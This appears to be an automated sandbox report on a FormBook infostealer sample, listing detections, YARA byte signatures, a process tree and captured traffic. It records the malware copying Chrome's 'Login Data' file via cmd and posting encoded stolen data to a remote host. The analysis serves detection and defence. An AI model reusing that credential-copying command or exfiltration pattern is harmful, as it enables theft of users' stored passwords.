Play interactive tourEdit tour

# Analysis Report Ijxlcmh_Signed_.exe

## Overview

### General Information

 Sample Name: Ijxlcmh_Signed_.exe Analysis ID: 299496 MD5: d5dd88f0d5994ec98e07b2fb77e72bc9 SHA1: 60d36f37a02d126601b7fde79be4db52a43a6be3 SHA256: 6c69a036d1c25c0c3203e2cc14ad23fd386bb69f3344fe78113e1f3f07b98a4c Tags: exe Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64Ijxlcmh_Signed_.exe (PID: 6252 cmdline: 'C:\Users\user\Desktop\Ijxlcmh_Signed_.exe' MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)ieinstal.exe (PID: 2168 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)Ijxldrv.exe (PID: 6976 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe' MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)ieinstal.exe (PID: 2616 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)Ijxldrv.exe (PID: 4112 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe' MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)ieinstal.exe (PID: 6232 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)autofmt.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)NETSTAT.EXE (PID: 6692 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)cmd.exe (PID: 6776 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)msiexec.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)msiexec.exe (PID: 1000 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\lxjI.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x9b:\$hotkey: \x0AHotKey=1
• 0x0:\$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\lxjI.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x14:\$file: URL=
• 0x0:\$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\lxjI.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x70:\$icon: IconFile=
• 0x0:\$url_explicit: [InternetShortcut]
SourceRuleDescriptionAuthorStrings
00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x88e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x148ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x956a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x133dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1a4e7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1b4ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x17409:\$sqlite3step: 68 34 1C 7B E1
• 0x1751c:\$sqlite3step: 68 34 1C 7B E1
• 0x17438:\$sqlite3text: 68 38 2A 90 C5
• 0x1755d:\$sqlite3text: 68 38 2A 90 C5
• 0x1744b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x17573:\$sqlite3blob: 68 53 D8 7F 8C
00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa56a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b4e7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c4ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 64 entries
SourceRuleDescriptionAuthorStrings
2.2.ieinstal.exe.10410000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
2.2.ieinstal.exe.10410000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa56a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b4e7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c4ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.ieinstal.exe.10410000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18409:\$sqlite3step: 68 34 1C 7B E1
• 0x1851c:\$sqlite3step: 68 34 1C 7B E1
• 0x18438:\$sqlite3text: 68 38 2A 90 C5
• 0x1855d:\$sqlite3text: 68 38 2A 90 C5
• 0x1844b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x18573:\$sqlite3blob: 68 53 D8 7F 8C
18.2.ieinstal.exe.10410000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
18.2.ieinstal.exe.10410000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa56a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b4e7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c4ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 22 entries

## Sigma Overview

### System Summary:

 Sigma detected: Steal Google chrome login data Show sources
 Source: Process started Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\NETSTAT.EXE, ParentImage: C:\Windows\SysWOW64\NETSTAT.EXE, ParentProcessId: 6692, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 6776

## Signature Overview

### AV Detection:

 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe ReversingLabs: Detection: 25%
 Multi AV Scanner detection for submitted file Show sources
 Source: Ijxlcmh_Signed_.exe Virustotal: Detection: 25% Perma Link Source: Ijxlcmh_Signed_.exe ReversingLabs: Detection: 25%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Source: Yara match File source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE Source: Yara match File source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 7.2.Ijxldrv.exe.10410000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 12.2.Ijxldrv.exe.10410000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 18.2.ieinstal.exe.10410000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 2.2.ieinstal.exe.10410000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 15.2.ieinstal.exe.10410000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then mov eax, dword ptr [0040C7CCh] 0_3_02243B34 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then or edx, 00000200h 0_3_02238308 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then or edx, 00000200h 0_3_02243928 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then or edx, 00000200h 0_3_02243935 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then push 00000000h 0_3_02238690 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then push 00000000h 0_3_02238698 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then mov eax, dword ptr [0040C7CCh] 0_3_02238514 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then push 00000000h 0_3_02243D9C Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then push 00000000h 0_3_0222B340 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then push 00000000h 0_3_0222B348 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then mov eax, dword ptr [0040C7CCh] 0_3_0222B1C4 Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe Code function: 4x nop then or edx, 00000200h 0_3_0222AFB8 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then mov eax, dword ptr [0040C7CCh] 7_3_02223B34 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then or edx, 00000200h 7_3_02218308 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then or edx, 00000200h 7_3_02223928 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then or edx, 00000200h 7_3_02223935 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then push 00000000h 7_3_02218690 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then push 00000000h 7_3_02218698 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then mov eax, dword ptr [0040C7CCh] 7_3_02218514 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then push 00000000h 7_3_02223D9C Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then push 00000000h 7_3_0220B340 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then push 00000000h 7_3_0220B348 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then mov eax, dword ptr [0040C7CCh] 7_3_0220B1C4 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then or edx, 00000200h 7_3_0220AFB8 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then mov eax, dword ptr [0040C7CCh] 12_3_02693B34 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then or edx, 00000200h 12_3_02688308 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then or edx, 00000200h 12_3_02693928 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then or edx, 00000200h 12_3_02693935 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then push 00000000h 12_3_02688698 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then push 00000000h 12_3_02688690 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then mov eax, dword ptr [0040C7CCh] 12_3_02688514 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then push 00000000h 12_3_02693D9C Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then push 00000000h 12_3_0267B340 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then push 00000000h 12_3_0267B348 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then mov eax, dword ptr [0040C7CCh] 12_3_0267B1C4 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 4x nop then or edx, 00000200h 12_3_0267AFB8

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49755
 Uses netstat to query active network connections and open ports Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /oav/?k0GdCl1=OGiTtEl8oZpE8Sv3fxvazbyjtykFcfSLP9Tv9n1IDimktFHXuVh+PBX3cY6ZEpQG1B1V&tZU4=NX1pk HTTP/1.1Host: www.mybabyshop4you.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 162.159.130.233 162.159.130.233 Source: Joe Sandbox View IP Address: 34.102.136.180 34.102.136.180
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
 JA3 SSL client fingerprint seen in connection with other malware Show sources
 Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /oav/ HTTP/1.1Host: www.mybabyshop4you.comConnection: closeContent-Length: 717Cache-Control: no-cacheOrigin: http://www.mybabyshop4you.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mybabyshop4you.com/oav/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6b 30 47 64 43 6c 31 3d 47 6b 75 70 7a 68 42 47 6b 49 41 36 75 52 6d 52 4f 55 75 63 71 66 47 31 39 67 67 75 64 5f 32 68 4e 37 57 54 35 68 42 4e 47 54 61 65 73 55 47 4b 72 48 49 4a 4d 78 4b 6f 66 34 4b 57 5a 4a 51 33 35 44 51 5a 7e 6f 46 49 30 56 67 64 70 69 4d 77 6d 55 59 57 47 37 6a 5a 53 6d 30 75 4d 4b 68 64 30 49 30 65 63 61 67 41 4d 78 31 58 39 33 5a 65 79 70 50 69 37 4c 44 41 5a 41 7a 41 37 69 55 43 52 46 76 51 77 54 69 46 73 73 56 54 68 70 53 36 36 79 6b 79 53 55 54 41 6e 50 6b 66 75 77 4a 78 72 79 31 6b 6c 6a 56 6a 49 50 33 37 72 62 46 58 7e 52 54 52 64 73 4c 6d 77 31 53 4d 61 55 58 47 37 7a 55 68 5a 31 47 36 43 74 41 57 73 62 6a 34 46 58 65 54 55 69 41 51 65 49 71 48 64 4f 28 77 67 6a 28 78 6f 53 4a 61 46 44 57 61 32 38 39 49 74 36 45 64 4c 65 33 36 48 63 41 43 37 79 4b 6f 75 44 7a 4a 57 70 68 61 31 34 52 73 47 4e 69 4b 74 6f 51 47 33 77 46 51 58 71 53 6f 65 34 5a 41 55 58 69 74 33 7a 53 5f 42 49 55 7a 52 67 6f 74 56 47 6f 4c 56 76 6d 34 76 72 73 79 79 77 32 4c 64 66 34 34 4d 44 37 69 67 74 63 64 34 34 63 65 35 55 64 32 4d 4e 72 78 5a 4c 38 78 58 62 74 4f 51 48 4a 50 74 43 39 36 71 6b 48 31 4a 62 4a 62 51 37 5a 46 58 39 70 46 57 6d 71 4f 78 35 69 6b 47 41 58 58 6a 76 5a 63 48 53 73 5a 5a 42 6e 6a 68 39 36 4a 41 34 6b 74 76 68 55 5f 53 6a 78 4d 52 33 52 65 4c 52 77 50 4b 4e 42 64 71 53 59 64 6a 36 31 6f 47 37 39 4e 41 33 6b 71 6f 32 65 41 70 48 72 73 53 56 49 42 75 37 39 76 79 7a 44 52 51 4f 55 6a 79 66 53 2d 32 75 49 51 32 4a 55 50 5a 5f 28 65 6c 62 54 65 63 2d 4e 75 76 44 37 72 50 56 6b 62 51 44 28 6f 53 52 34 4a 45 5f 53 64 44 45 6f 50 74 48 6d 35 76 38 4c 44 4e 39 30 68 46 69 6d 62 31 70 4c 36 37 58 70 2d 75 4b 69 31 6a 4e 6c 42 66 44 6a 36 31 46 34 30 28 36 6f 4c 45 36 6c 5a 70 72 56 2d 57 38 37 45 34 6c 32 5f 38 47 39 76 6b 6d 5a 4d 57 48 51 34 66 51 39 75 76 42 44 67 53 31 56 72 61 35 4c 31 61 35 57 6e 33 73 6e 63 78 7a 41 5a 7a 38 4e 6c 73 62 38 53 30 58 43 4d 43 48 39 54 50 4f 66 53 63 64 70 69 30 49 35 43 6a 49 7e 35 76 50 72 47 42 4c 43 35 7a 5a 4c 52 6b 35 72 41 36 4d 53 41 4b 54 76 36 72 76 38 49 56 6a 5a 5f 65 73 39 34 71 46 47 57 68 56 44 57 71 54 6d 64 58 33 79 5f 4c 31 78 2d 42 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: k0GdCl1=GkupzhBGkIA6uRmROUucqfG19ggud_2hN7WT5hBNGTaesUGKrHIJMxKof4KWZJQ35DQZ~oFI0VgdpiMwmUYWG7jZSm0uMKhd0I0ecagAMx1X93ZeypPi7LDAZAzA7iUCRFvQwTiFssVThpS66ykySUTAnPkfuwJxry1kljVjIP37rbFX~RTRdsLmw1SMaUXG7zUhZ1G6CtAWsbj4FXeTUiAQeIqHdO(wgj(xoSJaFDWa289It6EdLe36HcAC7yKouDzJWpha14RsGNiKtoQG3wFQXqSoe4ZAUXit3zS_BIUzRgotVGoLVvm4vrsyyw2Ldf44MD7igtcd44ce5Ud2MNrxZL8xXbtOQHJPtC96qkH1JbJbQ7ZFX9pFWmqOx5ikGAXXjv Source: global traffic HTTP traffic detected: POST /oav/ HTTP/1.1Host: www.mybabyshop4you.comConnection: closeContent-Length: 169817Cache-Control: no-cacheOrigin: http://www.mybabyshop4you.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mybabyshop4you.com/oav/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6b 30 47 64 43 6c 31 3d 47 6b 75 70 7a 6a 78 34 69 34 31 30 71 6a 7a 32 49 48 57 45 75 62 36 6e 71 48 51 48 4a 38 4b 4c 58 74 65 39 35 6b 4a 42 53 69 4b 41 28 48 75 4b 67 6b 67 4b 49 52 4b 76 4c 49 4b 5a 50 35 63 4c 30 79 30 42 7e 70 42 6d 30 56 6f 65 6a 45 77 78 6e 45 59 61 48 62 75 39 51 6d 78 36 4d 4a 56 30 30 74 4d 47 5a 61 6b 41 52 52 74 56 78 79 38 61 69 59 44 74 34 37 76 5a 62 42 62 64 37 56 46 37 52 6d 53 44 78 53 4f 39 6f 61 39 63 34 5a 43 53 28 6c 77 33 4b 6b 57 49 37 39 5a 46 72 52 46 31 73 77 64 73 67 69 56 69 57 4c 6a 6c 39 73 67 30 37 67 57 72 52 64 37 59 77 32 7a 35 58 43 28 54 73 69 49 58 59 41 7a 66 61 73 45 51 78 36 69 6e 53 68 71 75 54 53 51 5f 42 59 37 56 61 66 43 30 68 68 48 68 6c 51 35 58 44 78 7e 47 6a 59 35 30 71 70 4a 53 41 2d 47 71 41 62 6c 43 78 44 71 67 74 42 65 61 62 70 68 35 33 34 52 67 4d 73 53 59 70 72 38 42 79 68 55 44 57 74 4f 34 51 4d 70 54 59 78 6a 53 70 68 79 75 53 4a 55 5f 46 42 6f 52 52 48 64 47 51 6f 57 49 6e 4c 73 58 79 79 50 4a 64 66 34 61 4d 43 37 45 67 63 49 64 35 71 55 33 30 56 64 36 41 64 72 73 4a 4c 73 67 4f 63 73 56 51 48 42 50 28 48 52 63 34 6c 66 31 4d 49 67 70 51 66 74 46 52 4e 70 46 65 47 71 4c 37 5a 69 39 47 43 65 75 69 75 31 63 57 55 6f 62 59 67 6e 54 69 38 65 2d 56 49 6c 34 6c 46 41 68 57 6a 63 62 52 77 42 43 4b 77 6c 79 4b 36 4d 4c 75 33 55 47 6c 49 74 6e 45 4b 49 55 41 33 74 31 6f 32 54 59 6f 44 28 65 44 45 6b 45 76 36 4a 73 6b 69 4f 4e 62 50 55 67 67 4e 4c 2d 67 35 30 63 35 5a 51 4e 5a 66 50 5a 6c 35 32 61 64 37 5a 45 6b 69 65 65 49 6a 45 58 49 43 50 52 64 77 41 68 4e 74 6d 46 46 6b 35 65 72 6c 6d 52 75 4f 6d 4d 4d 2d 4e 32 42 67 4c 64 79 35 6d 4b 79 77 77 35 6c 72 75 49 75 66 4e 6f 65 54 6a 75 39 6e 6f 6f 78 35 64 4a 42 74 38 48 33 4a 6b 6e 50 65 58 47 69 45 6d 38 74 46 55 50 76 32 41 4d 62 6a 41 64 4f 46 46 52 73 51 58 43 45 58 73 61 55 35 48 55 4b 4a 79 66 67 64 53 6d 32 54 6f 57 78 65 38 48 35 36 6b 6a 37 77 61 76 62 68 4a 59 50 74 37 6f 45 4e 68 4f 38 4d 6c 63 6d 72 69 53 6c 50 4f 57 49 4b 37 61 28 5a 7e 76 37 2d 